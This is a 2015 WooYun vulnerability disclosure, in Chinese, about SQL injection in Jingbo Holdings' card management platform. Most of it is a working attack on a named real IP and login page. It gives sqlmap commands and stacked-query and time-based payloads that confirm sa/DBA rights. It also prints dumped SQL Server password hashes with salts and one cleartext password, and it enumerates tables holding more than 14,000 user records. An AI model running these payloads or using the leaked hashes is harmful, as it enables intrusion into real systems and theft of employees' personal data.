当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138200

漏洞标题:京博控股一卡通综合管理平台SQL注射漏洞(超过1万名用户的微信/email/用户名/密码等信息可被泄露)

相关厂商:山东京博控股股份有限公司

漏洞作者: 慢慢

提交时间:2015-09-06 15:26

修复时间:2015-10-21 15:28

公开时间:2015-10-21 15:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

京博控股一卡通综合管理平台SQL注射漏洞,超过1万名用户的微信,email,用户名,密码等信息泄露(sa权限)

详细说明:

京博控股一卡通综合管理平台登陆页面:

1.gif


网页地址:http://222.134.52.40:80/admin/sys/login.aspx
使用sqlmap进行测试:

sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --current-user --current-db --is-dba --users --passwords --threads=10


得出sa权限:

---
Parameter: cLoginName (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
Payload: __VIEWSTATE=/wEPDwULLTE4MjU0NTM0NjcPFgIeCVJldHVyblVybAUNbWFpbmZyYW1lLmh0bWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFC2NMb2dpbkltYWdlOZ7lWtbR9HHFDQObbjkZ09Hs9mM=&__EVENTVALIDATION=/wEWBAKupKyGCgLcmtX1BwKS6+/wDAKFr8OlB1TFYJlcUXX/2Jt52Ilt6YjMgE6J&cLoginName=rlug';IF(5456=5456) SELECT 5456 ELSE DROP FUNCTION VJSu--&cPassword=&cLoginImage.x=1&cLoginImage.y=1
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=/wEPDwULLTE4MjU0NTM0NjcPFgIeCVJldHVyblVybAUNbWFpbmZyYW1lLmh0bWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFC2NMb2dpbkltYWdlOZ7lWtbR9HHFDQObbjkZ09Hs9mM=&__EVENTVALIDATION=/wEWBAKupKyGCgLcmtX1BwKS6+/wDAKFr8OlB1TFYJlcUXX/2Jt52Ilt6YjMgE6J&cLoginName=rlug';WAITFOR DELAY '0:0:5'--&cPassword=&cLoginImage.x=1&cLoginImage.y=1
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: __VIEWSTATE=/wEPDwULLTE4MjU0NTM0NjcPFgIeCVJldHVyblVybAUNbWFpbmZyYW1lLmh0bWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFC2NMb2dpbkltYWdlOZ7lWtbR9HHFDQObbjkZ09Hs9mM=&__EVENTVALIDATION=/wEWBAKupKyGCgLcmtX1BwKS6+/wDAKFr8OlB1TFYJlcUXX/2Jt52Ilt6YjMgE6J&cLoginName=rlug' WAITFOR DELAY '0:0:5'--&cPassword=&cLoginImage.x=1&cLoginImage.y=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


current user:    'sa'
current database: 'yktdb_jingbo'
current user is DBA: True
database management system users [6]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] cl
[*] jbgx
[*] lzh
[*] sa
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x0100a7d480f52f8a378ea2b2cb4274340f3eb98e36646c2df89d
header: 0x0100
salt: a7d480f5
mixedcase: 2f8a378ea2b2cb4274340f3eb98e36646c2df89d
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x0100f6a10c3c5ba02c562f69c27c9714a7460e8506d1aba463a7
header: 0x0100
salt: f6a10c3c
mixedcase: 5ba02c562f69c27c9714a7460e8506d1aba463a7
[*] cl [1]:
password hash: 0x010054754196bd0b45c4340efc010e736d39aa6e72024a943154
header: 0x0100
salt: 54754196
mixedcase: bd0b45c4340efc010e736d39aa6e72024a943154
clear-text password: cl
[*] jbgx [1]:
password hash: 0x01000af11c231ed0e817e5906bcd6b5dd48848bab4131e0b6616
header: 0x0100
salt: 0af11c23
mixedcase: 1ed0e817e5906bcd6b5dd48848bab4131e0b6616
[*] lzh [1]:
password hash: 0x01000558b1cee854d4469ef1d862d0ce49fd2a804d5941de56ea
header: 0x0100
salt: 0558b1ce
mixedcase: e854d4469ef1d862d0ce49fd2a804d5941de56ea
[*] sa [1]:
password hash: 0x0100025441e9b0a734898b9787f562335e24f2fa129edbcc7f30
header: 0x0100
salt: 025441e9
mixedcase: b0a734898b9787f562335e24f2fa129edbcc7f30


继续测试:

sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --dbs


结果:

available databases [9]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] scm_main
[*] tempdb
[*] yktdb_jingbo
[*] ZYTK35


选择yktdb_jingbo进行测试:

sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent -D yktdb_jingbo --tables --threads=10


结果:

Database: yktdb_jingbo
[121 tables]
+---------------------------+
| EMPInfo |
| KQ_DevInfo |
| KQ_MonthlyReport |
| KQ_MonthlyReport_His |
| KQ_NoPerson |
| KQ_QJState |
| KQ_QJTypeLiuCheng |
| KQ_RECORD150513 |
| KQ_Record |
| KQ_Record0513bak |
| KQ_Record_His |
| KQ_State |
| KQ_Sys_BC |
| KQ_UserXJ |
| KQ_User_QJ |
| KQ_User_QJLCRecord |
| KqPdMonth_log |
| Middle_DptChange |
| Middle_DropEmply |
| Middle_Emply |
| Middle_EmplyChange |
| Middle_KQ_MonthlyReport |
| Middle_NewEmply |
| Notice |
| PersonLog |
| TR_SB_Record |
| TR_VW_EmpPhoto |
| TR_VW_GetAccStatus |
| TR_VW_KqRecord |
| TR_VW_PaymentBooks |
| TR_VW_PaymentBooksALL |
| TR_VW_PaymentBooks_his |
| TSYS_COMPANY |
| TSYS_DEPART |
| TSYS_Dic |
| TSYS_MODULE |
| TSYS_MODULEPOPEDOM |
| TSYS_POPEDOM |
| TSYS_PointLogin |
| TSYS_ROLE |
| TSYS_ROLEPOPEDOM |
| TSYS_SYSTEMLOG |
| TSYS_USER |
| TSYS_USERPOPEDOM |
| Temp_DKRecord |
| Temp_KQRecord |
| Tr_position |
| User_QX |
| View_EmplyPhoto |
| View_KQYearReport |
| View_MonthlyRecordT |
| View_MonthlyRecordT_his |
| View_QJSPLC |
| View_QJSPStep |
| View_QJType |
| View_Record |
| View_RecordBC |
| View_RecordJB |
| View_RecordT |
| View_RecordT_His |
| View_Station |
| View_UserBaseInfo |
| View_UserQJ |
| View_st |
| XF_DevInfo |
| ac_dict_AccDep |
| ac_dict_Accounts |
| dtproperties |
| erp_dptandperson |
| id_accountdepbak |
| id_accountsinfobak |
| kq_Code |
| kq_Define |
| kq_HolidayType |
| kq_Serial |
| kq_dkrecord |
| kq_hbsq |
| kq_holiday |
| kq_qj |
| kq_serialbak |
| kq_tbsq |
| kq_tbsq_new |
| kq_tbsqlc |
| kq_userqjlc |
| kq_weekday |
| kq_ycsq |
| mt_baseinfo |
| mt_dev |
| mt_dkrecord |
| mt_kqdev |
| mt_person |
| notice_viewer |
| pb_Duty |
| pb_EmployeeType |
| pb_EmplyOther |
| pb_depart |
| pb_emply |
| sysdiagrams |
| temp1 |
| temp_correct |
| temp_log |
| temp_userinfo |
| tempmj |
| tempmonth |
| tempqj |
| tmpkqjl |
| tmpkqjlsl |
| tr_vw_GetDKInfo |
| tr_vw_GetKqDevInfo |
| tr_vw_GetKqDevInfoByMonth |
| tr_vw_GetXfDevInfo |
| tr_vw_MonAccounts |
| user_dqj |
| user_duty |
| user_dyb |
| user_gsremark |
| view_qjtj |
| weixin |
| weixin_bf |
+---------------------------+


看到微信了,果断扫一下~~

sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --threads=10 -D yktdb_jingbo -T weixin --column


结果:

Database: yktdb_jingbo
Table: weixin
[4 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| cardnum | varchar |
| userid | int |
| userkey | varchar |
| username | varchar |
+----------+---------+


继续深入

sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --threads=10 -D yktdb_jingbo -T weixin -C userid --count
Database: yktdb_jingbo
+------------+---------+
| Table | Entries |
+------------+---------+
| dbo.weixin | 11426 |
+------------+---------+


尝试其他表:

sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --threads=10 -D yktdb_jingbo -T TSYS_USER --column


结果:

Database: yktdb_jingbo
Table: TSYS_USER
[20 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| COMPANYID | int |
| DEFAULTMODULE | int |
| DEPARTID | int |
| EID | varchar |
| EMAIL | varchar |
| ENDDATE | datetime |
| ILOCK | char |
| IONLINE | int |
| LOGINNAME | varchar |
| LOGINPASS | varchar |
| MPHONE | varchar |
| OPHONE | varchar |
| QYID | varchar |
| QYNAME | varchar |
| ROLEID | int |
| STARTDATE | datetime |
| USERCODE | varchar |
| USERID | int |
| USERNAME | varchar |
| USERSIGN | char |
+---------------+----------+


sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --threads=10 -D yktdb_jingbo -T TSYS_USER -C USERID --count
Database: yktdb_jingbo
+---------------+---------+
| Table | Entries |
+---------------+---------+
| dbo.TSYS_USER | 14325 |
+---------------+---------+


啊啊啊,14325!!!我扫不动了……

漏洞证明:

Database: yktdb_jingbo
+------------+---------+
| Table | Entries |
+------------+---------+
| dbo.weixin | 11426 |
+------------+---------+
Database: yktdb_jingbo
+---------------+---------+
| Table | Entries |
+---------------+---------+
| dbo.TSYS_USER | 14325 |
+---------------+---------+
Database: yktdb_jingbo
Table: TSYS_USER
[20 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| COMPANYID | int |
| DEFAULTMODULE | int |
| DEPARTID | int |
| EID | varchar |
| EMAIL | varchar |
| ENDDATE | datetime |
| ILOCK | char |
| IONLINE | int |
| LOGINNAME | varchar |
| LOGINPASS | varchar |
| MPHONE | varchar |
| OPHONE | varchar |
| QYID | varchar |
| QYNAME | varchar |
| ROLEID | int |
| STARTDATE | datetime |
| USERCODE | varchar |
| USERID | int |
| USERNAME | varchar |
| USERSIGN | char |
+---------------+----------+

修复方案:

增加过滤。

版权声明:转载请注明来源 慢慢@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评论